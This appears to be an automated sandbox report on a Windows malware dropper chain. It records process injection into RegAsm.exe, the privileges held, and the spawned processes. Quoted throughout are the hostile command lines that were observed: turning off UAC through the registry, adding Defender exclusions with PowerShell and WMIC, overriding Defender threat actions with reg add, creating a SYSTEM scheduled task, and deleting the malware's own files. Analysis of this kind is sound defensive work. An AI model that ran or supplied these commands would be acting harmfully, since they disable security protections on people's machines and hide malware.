Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 224 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1984 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\1000004002\0869e0ea89.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1392 wrote to memory of 4308 N/A C:\Users\Admin\1000004002\0869e0ea89.exe C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 1984 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 4308 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 224 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 4308 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 4264 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
PID 2248 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 2248 wrote to memory of 3572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 4308 wrote to memory of 5256 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5256 wrote to memory of 5376 N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 4308 wrote to memory of 5524 N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 5524 wrote to memory of 5568 N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4744,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\1000004002\0869e0ea89.exe

"C:\Users\Admin\1000004002\0869e0ea89.exe"

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe"

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"

C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 224 -ip 224

C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe

"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5524 -ip 5524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5524 -s 260

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"

C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe

"C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe"

C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe

"C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe" /s

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe

"C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe"

C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe

"C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe

"C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\AppData\Local\Temp\7zSE9DE.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe

.\Install.exe /NQHxdidUQs "385118" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 02:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe\" 1g /IuhdidLfUU 385118 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bqGGCwwWIommTRgeuN

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bqGGCwwWIommTRgeuN

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe 1g /IuhdidLfUU 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

